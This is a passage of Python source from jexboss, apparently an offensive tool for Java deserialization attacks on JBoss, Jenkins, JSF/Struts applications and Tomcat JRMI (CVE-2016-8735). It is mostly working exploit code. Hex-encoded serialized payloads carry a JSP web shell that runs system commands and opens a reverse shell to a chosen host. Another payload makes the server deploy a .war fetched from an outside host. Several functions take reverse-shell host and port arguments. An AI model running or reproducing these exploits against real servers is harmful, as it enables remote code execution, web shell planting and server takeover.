"\x6F\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3B\x69\x66\x28\x21\x6E\x65\x77\x20\x46\x69\x6C\x65\x28" + "\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x2E\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7B" + "\x50\x72\x69\x6E\x74\x57\x72\x69\x74\x65\x72\x20\x77\x3D\x6E\x65\x77\x20\x50\x72\x69\x6E\x74\x57" + "\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x3B\x77\x2E\x63\x6C" + "\x6F\x73\x65\x28\x29\x3B\x62\x72\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61" + "\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65" + "\x72\x28\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53" + "\x74\x72\x69\x6E\x67\x20\x6C\x76\x3D\x62\x72\x2E\x72\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x2E\x73" + "\x70\x6C\x69\x74\x28\x22\x20\x22\x29\x5B\x31\x5D\x3B\x69\x66\x28\x21\x6C\x76\x2E\x65\x71\x75\x61" + "\x6C\x73\x28\x22\x34\x22\x29\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x28\x22\x4E\x65\x77\x20" + "\x76\x65\x72\x73\x69\x6F\x6E\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x75\x70\x64\x61\x74\x65\x21\x22" + "\x29\x3B\x7D\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22" + "\x69\x64\x22\x29\x21\x3D\x2D\x31\x7C\x7C\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x69\x70" + "\x63\x6F\x6E\x66\x69\x67\x22\x29\x21\x3D\x2D\x31\x29\x7B\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74" + "\x53\x74\x72\x65\x61\x6D\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70\x74" + "\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x46\x61\x69\x6C" + "\x65\x64\x20\x74\x6F\x20\x63\x68\x65\x63\x6B\x20\x66\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22" + "\x29\x3B\x7D\x74\x72\x79\x7B\x50\x72\x6F\x63\x65\x73\x73\x20\x70\x3B\x62\x6F\x6F\x6C\x65\x61\x6E" + "\x20\x6E\x69\x78\x3D\x74\x72\x75\x65\x3B\x69\x66\x28\x21\x53\x79\x73\x74\x65\x6D\x2E\x67\x65\x74" + "\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6C\x65\x2E\x73\x65\x70\x61\x72\x61\x74\x6F\x72" + "\x22\x29\x2E\x65\x71\x75\x61\x6C\x73\x28\x22\x2F\x22\x29\x29\x7B\x6E\x69\x78\x3D\x66\x61\x6C\x73" + "\x65\x3B\x7D\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x6A\x65\x78\x72\x65\x6D" + "\x6F\x74\x65\x3D\x22\x29\x21\x3D\x2D\x31\x29\x7B\x53\x6F\x63\x6B\x65\x74\x20\x73\x63\x3D\x6E\x65" + "\x77\x20\x53\x6F\x63\x6B\x65\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3D\x22\x29\x5B\x31" + "\x5D\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2C\x49\x6E\x74\x65\x67\x65\x72\x2E" + "\x70\x61\x72\x73\x65\x49\x6E\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x31" + "\x5D\x29\x29\x3B\x69\x66\x28\x6E\x69\x78\x29\x7B\x73\x68\x3D\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73" + "\x68\x22\x3B\x7D\x65\x6C\x73\x65\x7B\x73\x68\x3D\x22\x63\x6D\x64\x2E\x65\x78\x65\x22\x3B\x7D\x70" + "\x3D\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78" + "\x65\x63\x28\x73\x68\x29\x3B\x28\x6E\x65\x77\x20\x72\x76\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75" + "\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x73\x63\x2E\x67\x65\x74\x4F\x75\x74\x70\x75\x74\x53\x74" + "\x72\x65\x61\x6D\x28\x29\x29\x29\x2E\x73\x74\x61\x72\x74\x28\x29\x3B\x28\x6E\x65\x77\x20\x72\x76" + "\x28\x73\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x70\x2E\x67" + "\x65\x74\x4F\x75\x74\x70\x7A\x00\x00\x01\xDB\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x2E" + "\x73\x74\x61\x72\x74\x28\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x69\x66\x28\x6E\x69\x78\x29\x7B\x70\x3D" + "\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65" + "\x63\x28\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x5B\x5D\x7B\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73" + "\x68\x22\x2C\x22\x2D\x63\x22\x2C\x73\x68\x7D\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x70\x3D\x52\x75\x6E" + "\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65\x63\x28\x22" + "\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x43\x20\x22\x2B\x73\x68\x29\x3B\x7D\x62\x72\x3D\x6E\x65\x77" + "\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75" + "\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65\x72\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75\x74" + "\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53\x74\x72\x69\x6E\x67\x20\x64\x3D\x62\x72\x2E\x72" + "\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x77\x68\x69\x6C\x65\x28\x64\x20\x21\x3D\x20\x6E\x75\x6C" + "\x6C\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x64\x29\x3B\x64\x3D\x62\x72\x2E\x72" + "\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70" + "\x74\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x55\x6E\x6B" + "\x6E\x6F\x77\x6E\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x22\x29\x3B\x7D\x7D\x25\x3E\x73\x72\x00\x11\x6A" + "\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x42\x6F\x6F\x6C\x65\x61\x6E\xCD\x20\x72\x80\xD5\x9C\xFA\xEE" + "\x02\x00\x01\x5A\x00\x05\x76\x61\x6C\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61" + "\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00" + "\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E" + "\x67\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x74\x00\x07\x62\x6F\x6F\x6C\x65" + "\x61\x6E\xF9\x12\x63\x17\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6F\x72\x67" + "\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x49\x6E\x76\x6F\x63\x61" + "\x74\x69\x6F\x6E\x4B\x65\x79\xB8\xFB\x72\x84\xD7\x93\x85\xF9\x02\x00\x01\x49\x00\x07\x6F\x72\x64" + "\x69\x6E\x61\x6C\x78\x70\x00\x00\x00\x04\x70\x78") + + headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue", + "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", + "Connection": "keep-alive", + "User-Agent": jexboss.get_random_user_agent()} + + r = gl_http_pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) + result = r.status + + if result == 401: + jexboss.print_and_flush(" Retrying...") + gl_http_pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) + + return get_successfully(url, "/jexinv4/jexinv4.jsp") + + +def exploit_web_console_invoker(url): + """ + Exploits web console invoker (/web-console/Invoker) + In Jboss 5, this method only works to deploy a .war within the server fs (not http). + :param url: The URL to exploit + :return: The HTTP status code + """ + payload = ("\xAC\xED\x00\x05\x73\x72\x00\x2E\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x63\x6F\x6E\x73\x6F" + "\x6C\x65\x2E\x72\x65\x6D\x6F\x74\x65\x2E\x52\x65\x6D\x6F\x74\x65\x4D\x42\x65\x61\x6E\x49\x6E\x76" + "\x6F\x63\x61\x74\x69\x6F\x6E\xE0\x4F\xA3\x7A\x74\xAE\x8D\xFA\x02\x00\x04\x4C\x00\x0A\x61\x63\x74" + "\x69\x6F\x6E\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72" + "\x69\x6E\x67\x3B\x5B\x00\x06\x70\x61\x72\x61\x6D\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C" + "\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x5B\x00\x09\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x74" + "\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x10" + "\x74\x61\x72\x67\x65\x74\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x74\x00\x1D\x4C\x6A\x61\x76\x61" + "\x78\x2F\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2F\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x3B" + "\x78\x70\x74\x00\x06\x64\x65\x70\x6C\x6F\x79\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61" + "\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00" + "\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x96\x25\x37\x36\x1A" + "\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\x49\x00\x04\x70\x6F\x72\x74" + "\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x71\x00\x7E\x00\x01\x4C\x00\x04\x66\x69\x6C\x65" + "\x71\x00\x7E\x00\x01\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x01\x4C\x00\x08\x70\x72\x6F\x74" + "\x6F\x63\x6F\x6C\x71\x00\x7E\x00\x01\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x01\x78\x70\xFF\xFF" + "\xFF\xFF\xFF\xFF\xFF\xFF\x74\x00\x0E\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66\x2E\x63\x6F\x6D\x74" + "\x00\x0F\x2F\x72\x6E\x70\x2F\x6A\x65\x78\x77\x73\x34\x2E\x77\x61\x72\x71\x00\x7E\x00\x0B\x74\x00" + "\x04\x68\x74\x74\x70\x70\x78\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53" + "\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74" + "\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x73\x72\x00\x1B\x6A\x61\x76\x61\x78\x2E" + "\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x0F\x03\xA7" + "\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x21\x6A\x62\x6F\x73\x73\x2E\x73\x79\x73\x74\x65" + "\x6D\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x4D\x61\x69\x6E\x44\x65\x70\x6C\x6F\x79\x65\x72\x78") + + headers = { + "Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation", + "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", + "Connection": "keep-alive", + "User-Agent": jexboss.get_random_user_agent()} + r = gl_http_pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) + result = r.status + if result == 401: + jexboss.print_and_flush(" Retrying...") + gl_http_pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) + + return get_successfully(url, "/jexws4/jexws4.jsp") + + +def exploit_servlet_deserialization(url, host, port, cmd, is_win, gadget, gadget_file): + """ + Exploits java deserialization in generic (JAX RS, B...) servlets + tested and working in many application servers with exposed servlet and commons-collections in classpath + :param url: The URL to exploit + :param host: host to make a reverse shell connection + :param port: port to make a reverse shell conneciton + :param cmd: commando to be executed in vulnerable server + :param is_win: if the target is windows + :param gadget: gadget type to generate exploit payload + :return: The HTTP status code + """ + if gadget_file is None: + cmd = generate_cmd_for_runtime_exec(cmd=cmd, host=host, port=port, is_win=is_win) + payload = get_payload_gadget(gadget_type=gadget, cmd=cmd) + else: + try: + with open(gadget_file, 'rb') as f: + payload = f.read() + except: + jexboss.print_and_flush(RED + "\n * The \"%s\" file could not be found. Make sure the name is correct or let the\n" + " the tool generate the payload itself.\n" % (gadget_file) + ENDC) + return 505 + + headers = { + "Content-Type": "application/x-java-serialized-object; class=github.com/joaomatosf/jexboss", + "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", + "Connection": "keep-alive", + "User-Agent": jexboss.get_random_user_agent()} + r = gl_http_pool.urlopen('POST', url, redirect=False, headers=headers, body=payload) + if r.status == 200: + return 201 + else: + return r.status + + +def exploit_application_deserialization(url, host, port, cmd, is_win, param, force, gadget_type, show_payload, gadget_file): + """ + Exploits java deserialization in POST parameters + Tested and working on multiple JSF, Seam and Struts applications running in JDK 6, 7 and 8. + :param url: JSF application URL + :param host: remote host to make a reverse shell connection + :param port: remote port to make a reverse shell connection + :param cmd: command to be executed into the exploited server + :param is_win: indicate that the command to be executed is for a windows system (cmd.exe /C) + :param param: the post parameter to inject the java serialized object + :param force: force send payload to url provided + :param gadget_type: the gadget type to generate the payload + :param show_payload: show generated payload + :param gadget_file: load user gadget from file + :return: The HTTP Status code + """ + param_content = None + + headers = { + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": jexboss.get_random_user_agent(), + "Content-Type": "application/x-www-form-urlencoded"} + + if gadget_file is None: + cmd = generate_cmd_for_runtime_exec(cmd=cmd, host=host, port=port, is_win=is_win) + payload = get_payload_gadget(gadget_type=gadget_type, cmd=cmd) + else: + try: + with open(gadget_file, 'rb') as f: + payload = f.read() + except: + jexboss.print_and_flush(RED + "\n * The \"%s\" file could not be found. Make sure the name is correct or let the\n" + " the tool generate the payload itself.\n" % (gadget_file) + ENDC) + return 505 + + out = BytesIO() + with gzip.GzipFile(fileobj=out, mode="wb") as f: + f.write(payload) + gift_gziped = base64.b64encode(out.getvalue()) + gift_b64 = base64.b64encode(payload) + gift_raw = payload + + # if force mode, sends payload in multiple formats + if force: + if param != "": param += "=" + jexboss.print_and_flush(GREEN + "\n * Sending serialized object to: %s...\n" % (url) + ENDC) + try: + gl_http_pool.request('POST', url, redirect=False, headers=headers, body=param + url_encode(gift_gziped)) + gl_http_pool.request('POST', url, redirect=False, headers=headers, body=param + url_encode(gift_b64)) + gl_http_pool.request('POST', url, redirect=False, headers=headers, body=param + gift_raw) + if param != "": + r = gl_http_pool.request('POST', url, redirect=False, headers=headers, body=gift_raw) + headers['Content-Type'] = "application/x-java-serialized-object; class=github.com/joaomatosf/jexboss" + r = gl_http_pool.request('POST', url, redirect=False, headers=headers, body=gift_raw) + except: + # Error sending the exploit payload... + # import traceback, sys + # traceback.print_exc(file=sys.stdout) + return 505 + else: + + # open initial page for get cookie + r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + cookie = r.getheader('set-cookie') + if cookie is not None: headers['Cookie'] = cookie + + # Forbidden + if r.status == 403: return 403 + + # find for java serialized object in the initial page + param_content = get_serialized_obj_from_param(str(r.data), param) + + # If does not exists a java serialized object in the initial page, check if it's a redirect page + if param_content is None: + redirect_link = get_html_redirect_link(str(r.data)) + if redirect_link is not None: + r = gl_http_pool.request('GET', url + "/" + redirect_link, redirect=True, headers=headers) + param_content = get_serialized_obj_from_param(str(r.data), param) + + # if param to be exploited is not ViewState, get the current viewState + if param != 'javax.faces.ViewState': + view_state = get_viewstate_value(str(r.data)) + if view_state is not None: + param = "javax.faces.ViewState=" + url_encode(view_state) + "&" + param + + if param != "": param += "=" + + # correct the url for POST + url = url.split('?')[0] + list_url_tokens = url.split('://')[-1].split('/') + # if user not provided jsf page (if after / is not param or in the last param not exist a dot) + if len(list_url_tokens) <= 1 or '.' not in list_url_tokens[-1]: + # extract the url authority and link for post and make a new url to exploit + link = get_link_for_post(str(r.data)) + url_base = get_url_base(url) + url = url_base + link + + jexboss.print_and_flush(GREEN + "\n [*] Sending serialized object to:\n" + " --> %s...\n" % (url) + ENDC) + try: + if param_content.startswith("H4sI"): + if show_payload: shows_payload(gift_gziped, gadget_file if gadget_file is not None else gadget_type) + r = gl_http_pool.request('POST', url, redirect=True, headers=headers,body=param + url_encode(gift_gziped)) + elif param_content.startswith("rO0"): + if show_payload: shows_payload(gift_b64, gadget_file if gadget_file is not None else gadget_type) + r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=param + url_encode(gift_b64)) + else: + r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=param + gift_raw) + except Exception as err: + if 'too many redirects' in str(err): + return 200 + else: + return 505 + + if r.status in (301, 302): + return 200 + else: + return r.status + + +def exploit_jenkins(url, host, port, cmd, is_win, gadget, show_payload): + """ + Exploits java deserialization in POST parameters + Tested and working on multiple JSF applications running in JDK6, 7 and 8. + :param url: url of the jenkins + :param host: remote host to make a reverse shell connection + :param port: remote port to make a reverse shell connection + :param cmd: command to be executed into the exploited server + :param is_win: indicate that the command to be executed is for a windows system (cmd.exe /C) + :param gadget: the gadget type to generate the payload + :param show_payload: show generated payload + :return: The HTTP Status code + """ + # stage 1: find client port + headers = { + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": jexboss.get_random_user_agent()} + cli_port = None + cli_ip = None + # get cli port and cli ip + if '://' in url: + cli_ip = url.split('://')[1].split('/')[0].split(':')[0] + else: + cli_ip = url.split('/')[0].split(':')[0] + r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + all_headers = r.getheaders() + for h in all_headers: + if 'CLI-Port' in h: + cli_port = int(all_headers[h]) + break + # if the cli port or ip was not found + if cli_port is None or cli_ip is None: return 505 + + # stage 2: connect to CLI port and send payload (message + gadget ) + # generate payload + payload = b"<===[JENKINS REMOTING CAPACITY]===>" + cmd = generate_cmd_for_runtime_exec(cmd=cmd, host=host, port=port, is_win=is_win) + if gadget == 'commons-collections3.1': + gadget = 'groovy1' + payload_gadget = get_payload_gadget(gadget_type=gadget, cmd=cmd) + gift_b64 = base64.b64encode(payload_gadget) + payload += gift_b64 + + jexboss.print_and_flush(GREEN + "\n * Sending serialized object to: %s:%s\n" % (cli_ip, cli_port) + ENDC) + # establishes connection and send the payload + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(7) + s.connect((cli_ip, cli_port)) + s.send(b"\x00\x14Protocol:CLI-connect") + + # receive all messages from the server + while b'JENKINS REMOTING CAPACITY' not in s.recv(1024): pass + + s.send(payload) + s.close() + except socket.error as err: + jexboss.print_and_flush(RED + "\n * [ERROR]: %s (%s:%s).\n" % (err,cli_ip, cli_port )+ ENDC) + return 505 + + # if no erros ocorred, consider that payload was send successfuly + return 200 + + +def exploit_jrmi(url, host, port, cmd, is_win): + ''' + JRMI Deserialization CVE-2016-8735 and CVE-2016-8735 + Apache Tomcat 9.0.0.M1 to 9.0.0.M11 + Apache Tomcat 8.5.0 to 8.5.6 + Apache Tomcat 8.0.0.RC1 to 8.0.38 + Apache Tomcat 7.0.0 to 7.0.72 + Apache Tomcat 6.0.0 to 6.0.47 + This exploits requires the listers org.apache.catalina.mbeans.JmxRemoteLifecycleListener in tomcat + The payload uses CommonsCollection gadget baseed on ysoserial. + + :param url: IP and Port from JRMI + :param host: host for reverse connection + :param port: port for reverse connection + :param cmd: command to be executed + :param is_win: especify if the command is for windos + :param gadget: gadget type + :param show_payload: print the payload generated + :return: result code + ''' + + cmd = generate_cmd_for_runtime_exec(cmd=cmd, host=host, port=port, is_win=is_win) + + try: + host_rmi = url.split(':')[0] + port_rmi = int(url.split(':')[1]) + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(7) + + s.connect((host_rmi,port_rmi)) + + payload = (b"\x50\xAC\xED\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4D\xC9\xD4\xE6\x3B\xDF\x74\x00\x16\x6A\x65\x78\ +\x62\x6F\x73\x73\x20\x31\x33\x34\x38\x34\x39\x35\x35\x31\x32\x31\x36\x39\x35\x73\x7D\x00\x00\x00\ +\x01\x00\x0F\x6A\x61\x76\x61\x2E\x72\x6D\x69\x2E\x52\x65\x6D\x6F\x74\x65\x70\x78\x72\x00\x17\x6A\ +\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x50\x72\x6F\x78\x79\xE1\x27\ +\xDA\x20\xCC\x10\x43\xCB\x02\x00\x01\x4C\x00\x01\x68\x74\x00\x25\x4C\x6A\x61\x76\x61\x2F\x6C\x61\ +\x6E\x67\x2F\x72\x65\x66\x6C\x65\x63\x74\x2F\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\ +\x64\x6C\x65\x72\x3B\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\ +\x61\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\ +\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x02\x00\ +\x02\x4C\x00\x0C\x6D\x65\x6D\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\ +\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B\x4C\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4C\x6A\x61\x76\ +\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x70\x78\x70\x73\x72\x00\x11\x6A\x61\x76\x61\ +\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\ +\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\ +\x64\x70\x78\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\ +\x7E\x00\x00\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x53\x65\x74\ +\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03\x00\x00\x70\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\ +\x00\x00\x00\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\ +\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\ +\x54\x69\x65\x64\x4D\x61\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02\x4C\ +\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\ +\x74\x3B\x4C\x00\x03\x6D\x61\x70\x71\x00\x7E\x00\x06\x70\x78\x70\x74\x00\x03\x66\x6F\x6F\x73\x72\ +\x00\x2A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\ +\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A\x79\x4D\x61\x70\x6E\xE5\x94\x82\ +\x9E\x79\x10\x94\x03\x00\x01\x4C\x00\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\ +\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\ +\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x70\x78\x70\x73\x72\x00\x3A\x6F\ +\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\ +\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x68\x61\x69\x6E\x65\x64\x54\x72\ +\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\ +\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72\x67\x2F\x61\x70\x61\ +\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\ +\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x70\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72\x67\ +\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\ +\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\ +\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\ +\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\ +\x63\x74\x6F\x72\x73\x2E\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\ +\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69\x43\x6F\x6E\x73\x74\x61\x6E\x74\ +\x71\x00\x7E\x00\x0E\x70\x78\x70\x76\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\ +\x6E\x74\x69\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3A\x6F\ 